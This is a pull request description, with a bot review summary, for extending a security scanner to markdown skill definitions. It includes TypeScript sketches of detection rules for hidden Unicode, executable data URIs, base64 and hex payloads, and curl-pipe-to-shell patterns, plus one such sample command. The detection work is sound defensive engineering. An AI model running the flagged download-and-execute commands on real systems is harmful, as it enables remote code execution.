#10705: security: extend skill scanner to detect threats in markdown skill definitions
stale
## Summary
Extends the skill scanner to detect security threats in markdown files (`.md`), closing a gap where malicious content in `SKILL.md` skill definitions could bypass code-only scanning.
**Motivation:** The ClawHavoc advisory revealed 341+ malicious ClawHub skills. VirusTotal scans code files for known malware signatures, but skill metadata lives in markdown (`SKILL.md`), which was previously unscanned. Attackers can embed download-and-execute patterns, obfuscated payloads, hidden Unicode (Trojan Source / CVE-2021-42574), and executable data URIs in skill documentation, which is then injected into LLM system prompts.
**Changes:**
- Split `SCANNABLE_EXTENSIONS` into `CODE_EXTENSIONS` and `MARKDOWN_EXTENSIONS` to enable file-type-specific rule routing
- Added `isMarkdown()` helper and routed `scanSource()` to markdown-specific rules for `.md` files
- **New markdown line rules:** `hidden-unicode` (zero-width + bidi override characters), `markdown-data-uri` (executable MIME types)
- **New markdown source rules:** `markdown-download-exec` (`curl|bash` patterns), `markdown-encoded-payload` (large base64 in code blocks), `markdown-hex-payload` (hex-encoded sequences)
- Existing code rules (`eval`, `child_process`, etc.) are isolated from markdown files to prevent false positives on documentation examples
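
As an illustration of the markdown source rules listed above, here is a minimal sketch of how `markdown-encoded-payload` and `markdown-hex-payload` could work. The thresholds (200 base64 characters, 8 hex escapes), the `Finding` shape, and the helper names `fencedBlocks` and `scanMarkdownSource` are assumptions for illustration, not the PR's actual values or API.

```typescript
// Hypothetical finding shape; the scanner's real type may differ.
type Finding = { ruleId: string; evidence: string };

// Built at runtime so this sketch can itself sit inside a fenced block.
const FENCE = "`".repeat(3);

// Assumed threshold: a run of 200+ base64 characters counts as "large".
const BASE64_RUN = /[A-Za-z0-9+\/]{200,}={0,2}/;
// Assumed threshold: 8+ consecutive \xNN escapes count as a hex payload.
const HEX_RUN = /(?:\\x[0-9a-fA-F]{2}){8,}/;

// Collects the bodies of fenced code blocks, line by line.
function fencedBlocks(source: string): string[] {
  const blocks: string[] = [];
  let current: string[] | null = null;
  for (const line of source.split("\n")) {
    if (line.trimStart().startsWith(FENCE)) {
      if (current === null) {
        current = []; // opening fence
      } else {
        blocks.push(current.join("\n")); // closing fence
        current = null;
      }
    } else if (current !== null) {
      current.push(line);
    }
  }
  return blocks;
}

function scanMarkdownSource(source: string): Finding[] {
  const findings: Finding[] = [];
  // Base64 is only checked inside fenced code, not in surrounding prose.
  for (const block of fencedBlocks(source)) {
    const match = block.match(BASE64_RUN);
    if (match) {
      findings.push({ ruleId: "markdown-encoded-payload", evidence: match[0].slice(0, 40) });
    }
  }
  // Hex escapes are checked across the whole document.
  const hex = source.match(HEX_RUN);
  if (hex) {
    findings.push({ ruleId: "markdown-hex-payload", evidence: hex[0].slice(0, 40) });
  }
  return findings;
}
```

A payload wrapped across several short lines would slip past this sketch, which is one way a heuristic like this can be too narrow.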
**Rule isolation:** Code-specific rules only fire on code files; markdown-specific rules only fire on `.md` files. This preserves existing scanner behavior while extending coverage.
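
The routing described above could look roughly like the following sketch. The names `CODE_EXTENSIONS`, `MARKDOWN_EXTENSIONS`, `isMarkdown()`, and `scanSource()` come from this PR, but the extension lists, the `Rule` shape, the `code-eval` rule ID, the `extensionOf` helper, and both regexes are assumptions made for illustration.

```typescript
// Assumed extension lists; the PR names these sets but does not show their contents.
const CODE_EXTENSIONS = new Set([".js", ".mjs", ".cjs", ".ts", ".jsx", ".tsx"]);
const MARKDOWN_EXTENSIONS = new Set([".md"]);

// Hypothetical rule shape.
type Rule = { ruleId: string; pattern: RegExp };

// One illustrative rule per family; "code-eval" is a made-up rule ID.
const CODE_RULES: Rule[] = [{ ruleId: "code-eval", pattern: /\beval\s*\(/ }];
const MARKDOWN_RULES: Rule[] = [
  { ruleId: "markdown-download-exec", pattern: /\b(?:curl|wget)\b[^\n|]*\|\s*(?:ba|z)?sh\b/i },
];

// Returns the lowercased extension including the dot, or "" if there is none.
function extensionOf(filePath: string): string {
  const base = filePath.split(/[\\\/]/).pop() ?? "";
  const dot = base.lastIndexOf(".");
  return dot <= 0 ? "" : base.slice(dot).toLowerCase();
}

function isMarkdown(filePath: string): boolean {
  return MARKDOWN_EXTENSIONS.has(extensionOf(filePath));
}

// Picks exactly one rule family per file, so the two families never overlap.
function scanSource(source: string, filePath: string): string[] {
  const rules = isMarkdown(filePath)
    ? MARKDOWN_RULES
    : CODE_EXTENSIONS.has(extensionOf(filePath))
      ? CODE_RULES
      : [];
  return rules.filter((rule) => rule.pattern.test(source)).map((rule) => rule.ruleId);
}
```

Because each file is matched against a single rule family, an `eval(...)` example in `SKILL.md` produces no finding, while the same text in a `.ts` file does.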
## Test plan
- [x] All 39 tests pass (13 original + 26 new)
- [x] New tests cover: zero-width Unicode, RTL overrides, data URIs, curl|bash, wget|sh, large base64 blocks, hex payloads
- [x] Rule isolation verified: code rules don't fire on `.md`, markdown rules don't fire on `.ts`
- [x] Clean `SKILL.md` produces zero findings
- [x] Directory scanning and summary counting work with mixed file types
- [x] `oxlint` passes with 0 warnings/errors
- [x] `tsgo` type checking passes
```bash
pnpm vitest run src/security/skill-scanner.test.ts
```
🤖 Generated with [Claude Code](https://claude.com/claude-code)
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
<!-- greptile_comment -->
<h2>Greptile Overview</h2>
<h3>Greptile Summary</h3>
- Extends the skill scanner to treat `.md` as scannable and routes markdown files through a new set of markdown-specific rules.
- Adds markdown line rules to detect hidden Unicode/BiDi characters and executable `data:` URIs.
- Adds markdown source rules to flag download-and-execute patterns, large base64 blocks in fenced code, and hex-encoded payload strings.
- Updates tests to cover new markdown findings, directory scanning of `SKILL.md`, summary counting, and rule isolation between code vs markdown.
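
For readers unfamiliar with the line rules summarized above, the following is a minimal sketch of per-line detection for `hidden-unicode` and `markdown-data-uri`. The character ranges, the list of MIME types treated as executable, the `LineFinding` shape, and the `scanMarkdownLines` name are assumptions, not the PR's actual definitions.

```typescript
// Hypothetical finding shape with a 1-based line number.
type LineFinding = { ruleId: string; line: number };

// Zero-width characters (U+200B..U+200D, U+2060, U+FEFF) plus bidirectional
// embedding/override (U+202A..U+202E) and isolate (U+2066..U+2069) controls.
// U+200D also appears in legitimate emoji sequences, so a real rule may need
// an allowlist to avoid noise.
const HIDDEN_UNICODE = /[\u200B-\u200D\u2060\uFEFF\u202A-\u202E\u2066-\u2069]/;

// Assumed set of "executable" MIME types.
const EXECUTABLE_DATA_URI =
  /data:(?:text\/html|(?:text|application)\/javascript|application\/x-sh)[;,]/i;

function scanMarkdownLines(source: string): LineFinding[] {
  const findings: LineFinding[] = [];
  source.split(/\r?\n/).forEach((text, index) => {
    // Neither regex uses the g or y flag, so test() keeps no state between lines.
    if (HIDDEN_UNICODE.test(text)) {
      findings.push({ ruleId: "hidden-unicode", line: index + 1 });
    }
    if (EXECUTABLE_DATA_URI.test(text)) {
      findings.push({ ruleId: "markdown-data-uri", line: index + 1 });
    }
  });
  return findings;
}
```

Image data URIs such as `data:image/png` are deliberately left out of the assumed MIME list, since inline images are common in ordinary documentation.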
<h3>Confidence Score: 3/5</h3>
- This PR is likely safe to merge, but a couple of detection rules are brittle and can cause missed detections or noisy false positives.
- Core change (routing `.md` to markdown-specific rules and expanding scannable extensions) is straightforward and well-tested. Main concerns are (1) regex statefulness in `scanSource` if any rule regex acquires `g/y` flags, and (2) markdown base64 and download/exec heuristics being either overly broad (false positives) or too narrow (missed common patterns), which undermines scanner correctness.
- src/security/skill-scanner.ts
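
The regex statefulness concern above can be reproduced in isolation. This sketch shows how `RegExp.prototype.test` on a pattern with the `g` flag resumes from `lastIndex`, and one possible mitigation; the helper names `naiveScanTwice`, `statelessTest`, and `safeScanTwice` are hypothetical and not part of the scanner.

```typescript
const SAMPLE = "curl https://example.invalid/install.sh | bash";

// With the g flag, test() starts at pattern.lastIndex and advances it after a
// match, so reusing one regex object across calls can miss a match.
function naiveScanTwice(): boolean[] {
  const pattern = /curl/g;
  return [pattern.test(SAMPLE), pattern.test(SAMPLE)];
}

// One possible mitigation: reset lastIndex before every test. For regexes
// without g or y this is a no-op, so it is safe to apply to every rule.
function statelessTest(pattern: RegExp, text: string): boolean {
  pattern.lastIndex = 0;
  return pattern.test(text);
}

function safeScanTwice(): boolean[] {
  const pattern = /curl/g;
  return [statelessTest(pattern, SAMPLE), statelessTest(pattern, SAMPLE)];
}
```

Here `naiveScanTwice()` returns `[true, false]` while `safeScanTwice()` returns `[true, true]`, which is the kind of missed detection that could appear if a rule regex ever acquires the `g` or `y` flag.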
<!-- greptile_other_comments_section -->
<!-- /greptile_comment -->
Most Similar PRs
- #13012: Security: detect invisible Unicode in skills and plugins (ASCII smu... (by agentwuzzi, 2026-02-10, 88.1% similar)
- #17502: feat: normalize skill scanner reason codes and trust messaging (by ArthurzKV, 2026-02-15, 81.3% similar)
- #20266: feat: skills-audit — Phase 1 security scanner for installed skills (by theMachineClay, 2026-02-18, 79.9% similar)
- #10559: feat(security): add plugin output scanner for prompt injection dete... (by DukeDeSouth, 2026-02-06, 79.5% similar)
- #13894: feat(security): add manifest scanner for SKILL.md trust analysis (by jdrhyne, 2026-02-11, 79.4% similar)
- #11032: fix(security): block plugin install/load on critical source scan fi... (by coygeek, 2026-02-07, 79.3% similar)
- #8075: fix(skills): add --ignore-scripts to all package managers (by yubrew, 2026-02-03, 79.0% similar)
- #22306: Warn on malformed skill parsing failures in load path (by AIflow-Labs, 2026-02-21, 78.2% similar)
- #10530: fix: tighten skill scanner false positives and add vm module detection (by abdelsfane, 2026-02-06, 77.8% similar)
- #20106: security: MAESTRO threat mitigations (LM-001, SC-003, AF-005, DI-00... (by kenhuangus, 2026-02-18, 76.4% similar)